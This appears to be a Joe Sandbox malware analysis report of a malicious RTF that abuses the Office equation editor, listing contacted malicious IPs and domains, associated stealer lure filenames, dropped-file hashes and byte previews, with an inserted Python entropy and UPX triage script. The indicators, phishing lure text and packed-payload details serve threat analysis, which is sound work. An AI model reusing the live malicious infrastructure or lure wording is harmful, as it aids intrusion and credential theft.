                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drfalse
                        • URL Reputation: safe
                        unknown
                        http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://api.ipify.orgcooRegSvcs.exetrue
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/soap/actor/nextRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drfalse
                        • Avira URL Cloud: safe
                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.162.95 | universalmovies.top | United States | 13335 | CLOUDFLARENETUS | true
185.38.142.10 | unknown | Portugal | 47674 | NETSOLUTIONSNL | true
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1461862
                        Start date and time:2024-06-24 18:26:15 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 45s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:12
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:2MbHBiqXH2.rtf
                        renamed because original name is a hash value
                        Original Sample Name:2d1b096a33d1b673fd06db9f3e861761.rtf
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winRTF@7/45@3/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 68
                        • Number of non-executed functions: 270
                        Cookbook Comments:
                        • Found application associated with file extension: .rtf
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31
                        • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net
• Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: 2MbHBiqXH2.rtf
Time | Type | Description
12:27:05 | API Interceptor | 278x Sleep call for process: EQNEDT32.EXE modified
12:27:09 | API Interceptor | 51x Sleep call for process: RegSvcs.exe modified
Match: 172.67.162.95
Associated Sample Name / URL | Detection | Threat Name
Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc | malicious | RedLine
Kobe 045EX07227 CLG6739.docx.doc | malicious | Unknown
Kobe 045EX07227 CLG6739.docx.doc | malicious | Unknown
PROFORMAXINVOICE.docx.doc | malicious | Lokibot
MV HTK Lavender.doc | malicious | Lokibot
PUO.docx.doc | malicious | HTMLPhisher
336HB7m70J.rtf | malicious | AgentTesla
LIW_009.docx.doc | malicious | FormBook
PAYMENT SLIP.doc | malicious | AgentTesla
PAYROLL.doc | malicious | FormBook
Match: 185.38.142.10
Associated Sample Name / URL | Detection | Threat Name | Context
YPSvIjQCzd.exe | malicious | RedLine | 185.38.142.10:7474/
Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc | malicious | RedLine | 185.38.142.10:7474/
MSH INV 2024-0117 Secure Payment Invoice for .exe | malicious | RedLine | 185.38.142.10:7474/
Match: universalmovies.top
Associated Sample Name / URL | Detection | Threat Name | Context
Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc | malicious | RedLine | 104.21.74.191
MT103-746394.doc | malicious | FormBook | 104.21.74.191
Kobe 045EX07227 CLG6739.docx.doc | malicious | Unknown | 172.67.162.95
Kobe 045EX07227 CLG6739.docx.doc | malicious | Unknown | 172.67.162.95
PROFORMAXINVOICE.docx.doc | malicious | Lokibot | 172.67.162.95
MV HTK Lavender.doc | malicious | Lokibot | 172.67.162.95
PUO 2.doc | malicious | HTMLPhisher | 104.21.74.191
PUO.docx.doc | malicious | HTMLPhisher | 172.67.162.95
336HB7m70J.rtf | malicious | AgentTesla | 172.67.162.95
lrShdpqqbi.rtf | malicious | FormBook | 104.21.74.191
Match: NETSOLUTIONSNL
Associated Sample Name / URL | Detection | Threat Name | Context
YPSvIjQCzd.exe | malicious | RedLine | 185.38.142.10
Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc | malicious | RedLine | 185.38.142.10
MSH INV 2024-0117 Secure Payment Invoice for .exe | malicious | RedLine | 185.38.142.10
sclfmLKwR7.elf | malicious | Gafgyt, Mirai | 185.38.142.103
3nYvEPuDi1.elf | malicious | Gafgyt, Mirai | 185.38.142.103
DS4T3FyXbu.elf | malicious | Gafgyt, Mirai | 185.38.142.103
pDHAW6Eo6E.elf | malicious | Gafgyt | 185.38.142.103
q5TDXPUPJg.elf | malicious | Gafgyt | 185.38.142.22
K8pQUoHdUc.elf | malicious | Gafgyt | 185.38.142.22
PWkv0lkpNM.elf | malicious | Gafgyt | 185.38.142.22
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc | malicious | RedLine | 104.21.74.191
MT103-746394.doc | malicious | FormBook | 172.67.180.94
QUOTATION PT INDONESIA.pdf.exe | malicious | AgentTesla | 104.26.13.205
DHL_Shipment_Details.exe | malicious | AgentTesla, GuLoader | 172.67.74.152
PO-2405280.xls | malicious | Remcos | 104.21.26.96
Po-6528279-SK.xls | malicious | AgentTesla | 188.114.97.3
Potwierdzenie zam#U00f3wienia.doc.exe | malicious | AgentTesla, DarkTortilla | 172.67.74.152
doc2406.vbs | malicious | FormBook | 172.67.75.40
PO53467.xls | malicious | Remcos | 104.21.26.96
https://erpportal.com/1331/LV/forms/new/100110215%7C1AC492413EB45535E0632D16670A3281 | malicious | Unknown | 162.247.243.29
Match: 7dcce5b76c8b17472d024758970a406b
Associated Sample Name / URL | Detection | Threat Name | Context
Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc | malicious | RedLine | 172.67.162.95
MT103-746394.doc | malicious | FormBook | 172.67.162.95
PO-2405280.xls | malicious | Remcos | 172.67.162.95
Po-6528279-SK.xls | malicious | AgentTesla | 172.67.162.95
PO53467.xls | malicious | Remcos | 172.67.162.95
PO-240528.xls | malicious | Remcos | 172.67.162.95
Bills Paid.xls | malicious | Remcos | 172.67.162.95
5698.docx.doc | malicious | Unknown | 172.67.162.95
IlWPStOFHj.rtf | malicious | Remcos | 172.67.162.95
V8ZnJcPOUY.rtf | malicious | HTMLPhisher | 172.67.162.95
Match: C:\Users\user\AppData\Roaming\notorious53209.exe
Associated Sample Name / URL | Detection | Threat Name
Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc | malicious | RedLine
Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe
Associated Sample Name / URL | Detection | Threat Name
Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc | malicious | RedLine
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                Category:dropped
                                                Size (bytes):644096
                                                Entropy (8bit):7.796206243772775
                                                Encrypted:false
                                                SSDEEP:12288:SYV6MorX7qzuC3QHO9FQVHPF51jgcN6S5UesUInNnpo2R2:hBXu9HGaVHN6S5U5Rn/Y
                                                MD5:901A623DBCCAA22525373CD36195EE14
                                                SHA1:9ADB6DDDB68CD7E116DA9392E7EE63A8FA394495
                                                SHA-256:B5E250A95073B5DFE33F66C13CC89DA0FC8D3AF226E5EFB06BB8FCFD9A4CD6EC
                                                SHA-512:EABEBA0EB9AE7E39577A7E313E50807CEE1B888F1C8FF0FA375E5DE9451A66471C791C23EA4F4AF85151F96B065D55E8C1320026D8503A048A3E5968F8EFFC1D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Joe Sandbox View:
                                                • Filename: Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc, Detection: malicious, Browse
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...."yf.........."......p...p....................@..........................p............@...@.......@.....................Dg..$.......Dg..................hk......................................t...H...........................................UPX0....................................UPX1.....p.......d..................@....rsrc....p.......l...h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
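The entry above describes the PE dropped by EQNEDT32.EXE as UPX compressed with an 8-bit entropy of 7.796, and the preview shows the UPX0/UPX1 section names and the "3.91.UPX!" stub marker. The following Python is an added example, not part of the Joe Sandbox report, that reproduces those two triage checks offline: Shannon entropy in bits per byte over the whole file (the same measure as the report's "Entropy (8bit)" field) and a walk of the PE section table to spot UPX section names. The PE it builds for itself is a constructed stand-in (a minimal header with UPX0/UPX1/.rsrc sections and a pseudo-random body), not the real notorious53209.exe; the 7.0 entropy threshold and the script name are the example's own choices.

```python
import hashlib
import math
import struct
import sys


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 to 8.0), the measure
    behind the 'Entropy (8bit)' field of a dropped-file entry."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_section_names(data: bytes) -> list:
    """Section names from the PE section table, or [] if data is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    coff = e_lfanew + 4                        # IMAGE_FILE_HEADER starts here
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size               # first IMAGE_SECTION_HEADER
    names = []
    for i in range(num_sections):
        raw = data[table + i * 40: table + i * 40 + 8]
        if len(raw) < 8:
            break                              # truncated section table
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def looks_upx_packed(data: bytes) -> bool:
    """UPX leaves its section names (UPX0/UPX1) and a 'UPX!' marker in the
    unpacking stub; either is enough to route the file to an unpacker."""
    return any(n.startswith("UPX") for n in pe_section_names(data)) or b"UPX!" in data


def triage(data: bytes) -> dict:
    ent = shannon_entropy(data)
    return {
        "entropy": round(ent, 3),
        "high_entropy": ent > 7.0,             # packed/encrypted payloads sit near 8
        "sections": pe_section_names(data),
        "upx": looks_upx_packed(data),
    }


def build_sample_pe() -> bytes:
    """Constructed stand-in for the dropped file: a minimal PE skeleton with
    UPX0/UPX1/.rsrc sections, the 'UPX!' marker and a high-entropy body."""
    dos = b"MZ" + bytes(58) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 224, 0x102)
    opt = bytes(224)                                           # zeroed optional header
    sections = b"".join(name.ljust(8, b"\0") + bytes(32)
                        for name in (b"UPX0", b"UPX1", b".rsrc"))
    body, block = b"", b"seed"
    for _ in range(128):                       # deterministic pseudo-random bytes
        block = hashlib.sha256(block).digest()
        body += block
    return dos + b"PE\0\0" + coff + opt + sections + b"3.91.UPX!" + body


if __name__ == "__main__":
    # Usage: python3 upx_triage.py <file>; with no argument the built-in sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    print(triage(data))
```

The two signals are complementary: a high entropy alone also matches encrypted installers and media files, while UPX section names alone are trivially renamed by modified packers, so a file is worth unpacking when either fires and the report's static fields (entropy near 8, "UPX compressed" file type) agree.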
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):16384
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:CE338FE6899778AACFC28414F2D9498B
                                                SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):349696
                                                Entropy (8bit):3.417490336338016
                                                Encrypted:false
                                                SSDEEP:6144:Syemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryec:k
                                                MD5:0EF01B48120959FD3A3D3F0B20BA5521
                                                SHA1:A77909012684BE2EF37CB67DBC2A2B384FC9FE45
                                                SHA-256:A431BF0591F5CED3369A2E54C29E90A19D23B7DD751A0F920DA4909AE46FFD04
                                                SHA-512:B95598EFB471F0B67268001B809DA7AF66C976E82D9FF7C69F29DE3150C4692814DDC0F79BDAABE1B66D1F1037BB96CAFB944F139E1745BF2E6BDF2CE8018EC3
                                                Malicious:false
                                                Reputation:low
                                                Preview:4.4.3.4.5.9.5.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1536
                                                Entropy (8bit):1.3531234148749365
                                                Encrypted:false
                                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbW:IiiiiiiiiifdLloZQc8++lsJe1Mzbl
                                                MD5:D68FBF5E0D370ED5FAC38172BAD02319
                                                SHA1:003B10AFACFD0D286FAABC9522B37AC59F9C6CBC
                                                SHA-256:8BF9E4664B787BD10E99A1F392E818EB147CF45FB1E2DDAED1F28FE793FCEEDF
                                                SHA-512:20770D77E283E7E5FBDE293F3CC504902314AA6343CA816FF8141C955C54F0073426A146319D191CDCE371D9305AFD8FD05888C258E1B089395D8E119A2DC5DC
                                                Malicious:false
                                                Reputation:low
                                                Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Roaming\notorious53209.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):97792
                                                Entropy (8bit):7.014747102810205
                                                Encrypted:false
                                                SSDEEP:1536:3f3IwWiew9JOnlc9exhXLpLiw5kvYBnuRJd4d89cpmnn/amKyQH4b:v4wWcJOl0yfLi6RBnGQdCcSTKyw4b
                                                MD5:F19534A061ECC70BB81126F953505D72
                                                SHA1:C1613560EA60D1A0407BA6B06EEA10C874512A48
                                                SHA-256:97D29F1E5E3BB5C8C1EB956C0135A820825973869C1B098705490010E0216FA8
                                                SHA-512:C9828341199C910F8661A1A6FBFC28C7A00D88C9378247DD57A154906E191AF63E1AB793253A14DE1FE764C28703A48F75CCF16E9840941A2B4A221E23C6F8C6
                                                Malicious:false
                                                Preview:.i.HYIY1QKJ6..UV.37LPNA1.3BHZIY1UKJ6DTUVS37LPNA1S3BHZIY1UKJ6.TUV],.BP.H.r.C..h.Y<8jF6;2$2^./1 /^'. -z;,_u"$....v>\S)~CL;w3BHZIY1..J6.UVV.;.PNA1S3BH.I[0^Jz6D TVS;7LPNA1m.CHZiY1UKJ6DT.VS.7LPLA1W3BHZIY1QKJ6DTUVS.6LPLA1S3BHYI..UKZ6DDUVS3'LP^A1S3BHJIY1UKJ6DTUV..6L.NA1S.CH.MY1UKJ6DTUVS37LPNA1S.CHVIY1UKJ6DTUVS37LPNA1S3BHZIY1UKJ6DTUVS37LPNA1S3BHZIY1UkJ6LTUVS37LPNA1[.BH.IY1UKJ6DTUV}GR4$NA1.@CHZiY1U?K6DVUVS37LPNA1S3BHzIYQ{99D'TUV.77LP.@1S5BHZ?X1UKJ6DTUVS37L.NAq}A'$5*Y1YKJ6D.TVS17LP2@1S3BHZIY1UKJ6.TU.S37LPNA1S3BHZIY1u.K6DTUV.37LRND1.BHj.Y1VKJ6.TUPS37LPNA1S3BHZIY1UKJ6DTUVS37LPNA1S3BHZIY1UKJ6DTUVH.>LpMA1R3BY)HY1_AHHGTURv. j.LA1W.DXZI_BWKJ<a.VVS7.MPNj^W3BBQq.3UKMYATU\D$..XNA0v%]B.@Y1Tn.<ETQ~U37F#IA1Y.g_D.P1UJo.FUUR{57LZ=F1S9.mBT.8UKK..STVW.1LPD26S3H.rHX1S$B6D^Yn.17LBLi8S3HE)@Y1SXNEhUUP@6&H.DA1YNCHZM';UK@%BEQ_ 87LZfM1S9-EZISLTKJ2UP.WS33S_.H1S2g.HHY5}MJ6N'RVS9XBPNK.I-.AZIX...J6@|SVS9DKPNK"U..AEw.8UKK...UVW.1LPD26S3H:[IYA+AJ6N|ZVS9.\PNK^]3BBwGH5.JJ6@|QWS5.@AJ:0S3F`YHY7FM[0lEUVY.aMPNP7E\PHZCJ9GCb%DT_9
                                                Process:C:\Users\user\AppData\Roaming\notorious53209.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):77430
                                                Entropy (8bit):7.847295981704258
                                                Encrypted:false
                                                SSDEEP:1536:h7JUSmTdZHmVysGL4cdNtKFk8MfCCaeQ6++dzexRW0vqN:h7QZGVysGLDvQffC9Xyxs0vM
                                                MD5:30AB7658AD775CB44E4B08C7EBC12A2C
                                                SHA1:5D14B0BFB0AE504148EDC517F41DC0A5992ED935
                                                SHA-256:8FAD249F983DBF5CAAEF3D72A53210F4A1B2BE6D81B2EB3A59CF7151BF5666C1
                                                SHA-512:DCB6707E2290CBC21F4C3015E249001AB87A5A26945F4AE9E57D067C8FC135FA1847929F58B1039F9D0A2EB5FC50129B9DD47AF43EA9E4CFC2102EE762A91A70
                                                Malicious:false
                                                Preview:EA06..~..ZzT..&.1...Sm..V.....:.1...T....U..(.J.Z..1....x...vY..T?T....C.e.....qj.M.s)$....d....' ..r...E$.@#pk...S..t....#0Xu*m.......x....&.0.R.Sj$..V....1m.P...H....j.L.`.Pf5p...@*5...@..f...Uiu............)@....f..8....0......C.U.B? ....J.S..;[... ...h.)...`...63?...`....I..os...N.`cf.....1..@...`....S.7...O$..3.....8& ....Q.A*.X..G.u.R..(...R.Q&>|...j.Vf5`...T...<?.... s.e.A..t*..Y...4.E..U.]...T.....+..M~.W.....Z.S....u....P.7...K..h5J.r.$.pk.....%......n.O(.J...3..t.......J..J....Z.J.5..+S.4.9.[hUN..K...:.Z....*.I..3.z.T...$.M....*.@P......E..0.:.:.h..j........0.....'..it.-..Q..'.......Kh..MN.T..UZ...S...u.."cS.Y...Efk}....=J.S..(U.u.;I...5.Mb)..R....L.`.R....V1...n....U@*=:..k4.].. .V....p...W@H....5.R....^.5.P(4...3.X+4...M..-.Z.Z..........P.V.t....b..*.......*.i.H.Xi.....0....O....J.>.X...5...D.S-..p....H.....W%1.L.S..l.:u.5@...|.#T..$..-Jsq.M.T.]Bk...)..|.V.pR(.?..d....U........@.e2.5..h3j%JMJ.`&UZu.kv.Um.JX....I(.J.....]y.I.Noj..
                                                Process:C:\Users\user\AppData\Roaming\notorious53209.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):9840
                                                Entropy (8bit):7.599061336130256
                                                Encrypted:false
                                                SSDEEP:192:6ZxWQa8nm1Wh8fpWAsdzNasmdge/rEoTyRLB7bNZUDLrMZkn:6Zx3a8nmYhzd0smr/rEvRLtZeDXMZo
                                                MD5:DD1E8868F31121B176C168A4A1B48E63
                                                SHA1:1A57A6B5DA768E963166B07A13A38EEC98F0878F
                                                SHA-256:D36E5C68763ED63F3068F5330F4D80488A0294C05663C30ADE57E017EA50F842
                                                SHA-512:F95B66FBDD3DD81861189ACC96A2C3121493C8109D37C29C68C99B572A37C551AAA44A8632985F4C8335E02D9B33F2C9501791FA3084310031E6E5417B1A6096
                                                Malicious:false
                                                Preview:EA06..pT..h.I..D.P..)..q1..htZ..g6.M.SY..mD.Mf.y..e2..&3y..9.M.....9..4i...4...9..8.P.T:4.1.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,S....f.I...a..-vk5.........6.l,`........fs;....`....g.I......l..]..f.`...9|....p.1..... ..$h.c.....#@...H,....`..k0.H.f. ...<zk5....!9.B...3p.n.f.I..q7.t.,. ....4....`....8.........c....P....0.... ..Y@....../Z..-zs5...jq7...zl........V....#.p..N&...M.^.9.....7.:..w.......7...}3p#..oc...f.P./....J.v.5..@{...........a..f.....`.Y..`...&.......x...u| .....Y,@=.%.d....&.)...,S`./..8....@..%....Y@..;...#.Y,s ./.k5...4.;...K.4|.;..g.c....c..&.i....x.&.k...c.Y'3Y...@}.4..3.....33...se.M'.@C`..s....e.,..h........Y.......Y.$.p.Y...f.e...8.....2...@.;1.X.`..L' ..........@.37.Ll.K.......9d..,vd.....i2........#. ....3a..g.`j.....Bvf.....@R.r"p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b
                                                Process:C:\Users\user\AppData\Roaming\notorious53209.exe
                                                File Type:ASCII text, with very long lines (28756), with no line terminators
                                                Category:dropped
                                                Size (bytes):28756
                                                Entropy (8bit):3.5909811262375784
                                                Encrypted:false
                                                SSDEEP:768:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbA+IL26cz24vfF3if6gn:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RC
                                                MD5:C2214B487E6119B5226D591926532EE9
                                                SHA1:D9A27C71655D441A47A92AA63AAD433F25625FB5
                                                SHA-256:33CE9852B482618CCE0E5C282FD710E02400CB310CEE839537DB9C2585167ADB
                                                SHA-512:0AB7541E705BC233A5F834C271C4888CC0F3DA45A7E10E659391CEFEF3082F7D993D94E79629111B35B4D8AFC3BACB83EA0BF57BA737C1B6D956825EF2A7C939
                                                Malicious:false
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, user version 7, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 5, database pages 4, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                Category:dropped
                                                Size (bytes):131072
                                                Entropy (8bit):0.07093764277882578
                                                Encrypted:false
                                                SSDEEP:12:DgIfgbz+Kh0sFcw23FmdAc/OPVJXfPNn43etRRIYRJxeYaNcDakMGz:DCf1ysFZ232ANVpP9TJKN0MG
                                                MD5:37F03D0EB1744FFEBCF26E3DB4A4280F
                                                SHA1:0B120B18B36AD6A64C27D3845A5871D10568C92E
                                                SHA-256:4D7F53C9B0D3757074542B9EB246FA5242456418394DAD90D23CB0CE8D664040
